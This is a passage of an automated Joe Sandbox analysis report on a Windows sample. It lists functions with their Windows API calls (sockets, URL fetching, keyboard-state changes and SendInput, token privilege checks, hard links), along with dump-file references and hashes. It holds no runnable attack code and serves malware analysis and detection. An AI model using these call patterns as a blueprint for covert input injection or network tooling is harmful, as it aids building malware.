SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 002A9AD2
__itow.LIBCMT ref: 002A9B03

Part of subcall function 002A9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 002A9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 002A9B6C
__itow.LIBCMT ref: 002A9BC3

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 81421e26daf7a4314205bf6434e5d17a3cdacabc4c54192a9b5c17aa08a940d2
Instruction ID: fc65f174ac653638e35000e135eb17243a868e6bcf422044cad87433504482ab
Opcode Fuzzy Hash: 81421e26daf7a4314205bf6434e5d17a3cdacabc4c54192a9b5c17aa08a940d2
Instruction Fuzzy Hash: F241CF70A10209ABDF11EF55D845BFE7BB9EF45715F000069FD05A3291DB709AA8CBA1

Function 002C69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 002C69D1
WSAGetLastError.WSOCK32(00000000), ref: 002C69E1

Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002C6A45
WSAGetLastError.WSOCK32(00000000), ref: 002C6A51

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: af89b89616ddfb24cd4e934d66443847b323374b9b1470a9ee2dd7766e0d58ce
Instruction ID: 14f1137297dcb360daf587337376cfc9dadbd390c6c1a35b1836f1318584c2c9
Opcode Fuzzy Hash: af89b89616ddfb24cd4e934d66443847b323374b9b1470a9ee2dd7766e0d58ce
Instruction Fuzzy Hash: 0D419175750200AFEB60AF24DC8AF2A77E49B04B14F14851CFE19AF2D2DBB09D548B99

Function 002C641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,002DF910), ref: 002C64A7
_strlen.LIBCMT ref: 002C64D9

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 41118af33988b23261e06d447a5f1dfcec75fe0d53cdaf3c50a3f2276c10d8eb
Instruction ID: b3a1a6314727a8fe0e632396d992c32083729f60c950d442ed250ec1320ccf02
Opcode Fuzzy Hash: 41118af33988b23261e06d447a5f1dfcec75fe0d53cdaf3c50a3f2276c10d8eb
Instruction Fuzzy Hash: B141C671920104ABCB14EBA4DCD9FBEB7A8AF04310F648259FC1A97292DB30AD64CF54

Function 002BB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002BB89E
GetLastError.KERNEL32(?,00000000), ref: 002BB8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002BB8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002BB915

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 2e6dded400eb982a8eb34d7d3cfad9011fbf63cce9646d19c38a28bd22484f1b
Instruction ID: 03368910b6840c456d280667fdfcdf9082abf9bff9c74c10095a47f4fa7003b4
Opcode Fuzzy Hash: 2e6dded400eb982a8eb34d7d3cfad9011fbf63cce9646d19c38a28bd22484f1b
Instruction Fuzzy Hash: 8C414839A20A11DFCB11EF14C588A5DBBE1AF4A310F098088EC4A9B362CB30FD55CF95

Function 002D8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002D88DE

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: c764609c7fb5dc2ad9e46c4a3fdae64beb8a6ab75f6ec1f475e39635a49c3505
Instruction ID: 27a59dc21c6f10eaa5032fdc1921e7d7ab40a4ce8014631518fab888f089e2f6
Opcode Fuzzy Hash: c764609c7fb5dc2ad9e46c4a3fdae64beb8a6ab75f6ec1f475e39635a49c3505
Instruction Fuzzy Hash: 8731C134620109EFEB219F58DC59FFC77A5EB09310FA44113FA91E63A1CA70ED609B96

Function 002DAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 002DAB60
GetWindowRect.USER32(?,?), ref: 002DABD6
PtInRect.USER32(?,?,002DC014), ref: 002DABE6
MessageBeep.USER32(00000000), ref: 002DAC57

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 4f64e53043eaa83711519e3509e5cf41b21b485024da791f0530aa84603e0c5e
Instruction ID: ab305b5964abe42fd228c7cd0bf714d81a84d48bf427d6c937bd1a027eb8afb2
Opcode Fuzzy Hash: 4f64e53043eaa83711519e3509e5cf41b21b485024da791f0530aa84603e0c5e
Instruction Fuzzy Hash: AD413830A20119DFCB11DF58D884EA97BF5BB49720F1880ABE8159B360D730AD51CB92

Function 002B0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 002B0B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 002B0B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 002B0BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 002B0BFB

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f174229552de80ee41531278a87affe54d83eeff8720e532762b29ce117c3953
Instruction ID: 2f7332a1ff1e464390c78de352f6b5401f8cbc107d4720eb9832ad6e926f2242
Opcode Fuzzy Hash: f174229552de80ee41531278a87affe54d83eeff8720e532762b29ce117c3953
Instruction Fuzzy Hash: 7D319A30D60209AEFF328F258C89BFBBBA9EB4539CF08435AE591521E1C3B48D609755

Function 002B0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 002B0C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 002B0C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 002B0CE1
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 002B0D33

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 975b192b549689d55146ce2b1b830cf9fcec7a78bf56a2e63ca0b2bf638e6670
Instruction ID: 012e32564ad0b82a6b5538164806565bf06173bee030cc2101308650ec557402
Opcode Fuzzy Hash: 975b192b549689d55146ce2b1b830cf9fcec7a78bf56a2e63ca0b2bf638e6670
Instruction Fuzzy Hash: 693166309202096EFF328E659C58BFFBF66EB45360F04831BE481521D1C7789D658795

Function 002861C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002861FB
__isleadbyte_l.LIBCMT ref: 00286229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00286257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0028628D

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 8d67987681a3dfa73002bea28d0d967ff72ad5c9842557dc6ebfed1899615713
Instruction ID: b69e2f6f35adfdf70cf374ee0e74e3829f20727f87c14f06e5be0b328300ac96
Opcode Fuzzy Hash: 8d67987681a3dfa73002bea28d0d967ff72ad5c9842557dc6ebfed1899615713
Instruction Fuzzy Hash: 7431C134612246AFDF21AF64CC4CBAA7BA9FF41310F154069E828971D1D771ED60DB50

Function 002D4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002D4F02

Part of subcall function 002B3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002B365B
Part of subcall function 002B3641: GetCurrentThreadId.KERNEL32 ref: 002B3662
Part of subcall function 002B3641: AttachThreadInput.USER32(00000000,?,002B5005), ref: 002B3669

GetCaretPos.USER32(?), ref: 002D4F13
ClientToScreen.USER32(00000000,?), ref: 002D4F4E
GetForegroundWindow.USER32 ref: 002D4F54

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 2d8e56944deac8c5b366c22af99d588be5f49c676358c911f29da4999844d3e6
Instruction ID: ffc24a664f75536c21c0c2154dbc423b61f214b1f22a3b4008f33bc44d2a5ad9
Opcode Fuzzy Hash: 2d8e56944deac8c5b366c22af99d588be5f49c676358c911f29da4999844d3e6
Instruction Fuzzy Hash: 7B312C72D10108AFDB00EFA5C9859EFB7F9EF88300F10446AE815E7241DA719E55CFA4

Function 002DC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

GetCursorPos.USER32(?), ref: 002DC4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0028B9AB,?,?,?,?,?), ref: 002DC4E7
GetCursorPos.USER32(?), ref: 002DC534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0028B9AB,?,?,?), ref: 002DC56E

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: a8c54da72437057e9450c4aef2890c8107125ffa9aa1955770b2b977cf4aff58
Instruction ID: 1c1c056a1862f2da2307f790605a800f31a013a09ab19fb98c5f2b8c6ab3b7bd
Opcode Fuzzy Hash: a8c54da72437057e9450c4aef2890c8107125ffa9aa1955770b2b977cf4aff58
Instruction Fuzzy Hash: 9D31B635620019EFCB15CF98E858EEA7BB9EB49310F944066F9059B3A1C731AD60DFA4

Function 002A8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002A8121
Part of subcall function 002A810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002A812B
Part of subcall function 002A810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A813A
Part of subcall function 002A810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8141
Part of subcall function 002A810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002A86A3
_memcmp.LIBCMT ref: 002A86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A86FC
HeapFree.KERNEL32(00000000), ref: 002A8703

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 31074984c18815598b01b6c92235c18b4d0e55f05c40ee0e8f4331a81071d021
Instruction ID: 3e9bada5ccaffad5b629714c388b7fecc1920023631032516d1530433ca46b03
Opcode Fuzzy Hash: 31074984c18815598b01b6c92235c18b4d0e55f05c40ee0e8f4331a81071d021
Instruction Fuzzy Hash: 35219071E51109EFEB10DFA4CA49BEEB7B8EF45705F15805AE445A7240DF30AE15CB50

Function 0027098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 002709AE

Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7896,?,?,00000000), ref: 00255A2C
Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7896,?,?,00000000,?,?), ref: 00255A50

_fprintf.LIBCMT ref: 002709E5
OutputDebugStringW.KERNEL32(?), ref: 002A5DBB

Part of subcall function 00274AAA: _flsall.LIBCMT ref: 00274AC3

__setmode.LIBCMT ref: 00270A1A

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 09dbd2f95b5ef5b6f50ce1d137dee4b5c1ef274c44aacf4ddd41e54f6998d587
Instruction ID: 627df0c6ccf85c6e3d53a9b3a6e16376d316073dc01a23e91f000a38886ef51b
Opcode Fuzzy Hash: 09dbd2f95b5ef5b6f50ce1d137dee4b5c1ef274c44aacf4ddd41e54f6998d587
Instruction Fuzzy Hash: 0C115731924614AFCB04B7B49C8A8FE77AC9F46320F248015F60852182EF7048BA9BA5

Function 002C1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002C17A3

Part of subcall function 002C182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002C184C
Part of subcall function 002C182D: InternetCloseHandle.WININET(00000000), ref: 002C18E9

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 82bc369a4240a0de02e5b341b8025513eacda1a5545e7b65109ea91af60d2043
Instruction ID: 0186acfcca8e63c0c7431f1ebaa0ee65835f0f50513da816b725a3cff2113a33
Opcode Fuzzy Hash: 82bc369a4240a0de02e5b341b8025513eacda1a5545e7b65109ea91af60d2043
Instruction Fuzzy Hash: BC210431224601BFFB168F60DC02FBABBA9FF4A700F10422EF90196551DB71D8309BA0

Function 002B3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,002DFAC0), ref: 002B3A64
GetLastError.KERNEL32 ref: 002B3A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 002B3A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,002DFAC0), ref: 002B3ADF

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: e2dc9783a62be072d2bcfc1342704c41abae5ffc60b04a5e1f3b5c73eae1d236
Instruction ID: e0ebe6a29b006c788ed62e786af52465a133e963be733d51445fb40395f6298c
Opcode Fuzzy Hash: e2dc9783a62be072d2bcfc1342704c41abae5ffc60b04a5e1f3b5c73eae1d236
Instruction Fuzzy Hash: FD21D6755182028F8300DF28D9858AA77E4BF553A4F244A1EF8DAC72A1D731DE19CB86

Function 002850E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00285101

Part of subcall function 0027571C: __FF_MSGBANNER.LIBCMT ref: 00275733
Part of subcall function 0027571C: __NMSG_WRITE.LIBCMT ref: 0027573A
Part of subcall function 0027571C: RtlAllocateHeap.NTDLL(013D0000,00000000,00000001,00000000,?,?,?,00270DD3,?), ref: 0027575F

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: cd803149e97c64d6c226bcdc71ecf2bb40d3080376589b530fa68f296f10c4d8
Instruction ID: 102817c4b9f48a96ce4766c299d7c3075eb82b01dfeddc5d7eb03961b6a073f9
Opcode Fuzzy Hash: cd803149e97c64d6c226bcdc71ecf2bb40d3080376589b530fa68f296f10c4d8
Instruction Fuzzy Hash: E211A376932A22AECB313F74EC4D75E37989F04361B10952AF90DE61D0DF7489609B94

Function 002C6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7896,?,?,00000000), ref: 00255A2C
Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7896,?,?,00000000,?,?), ref: 00255A50

gethostbyname.WSOCK32(?,?,?), ref: 002C6399
WSAGetLastError.WSOCK32(00000000), ref: 002C63A4
_memmove.LIBCMT ref: 002C63D1
inet_ntoa.WSOCK32(?), ref: 002C63DC

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: e5c8eb2915ca89da81c61c1fe527fb1b20cb768be8ae3e213192890930da4489
Instruction ID: 90d681f14ced62a9c63b116adfeac1a2884262d9b5a5d33d79a9723078211535
Opcode Fuzzy Hash: e5c8eb2915ca89da81c61c1fe527fb1b20cb768be8ae3e213192890930da4489
Instruction Fuzzy Hash: 28115171920109AFCB04FBA4DD9ADEEB7B8AF04311B144169F906A7161DB309E28DFA5

Function 002A8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 002A8B61
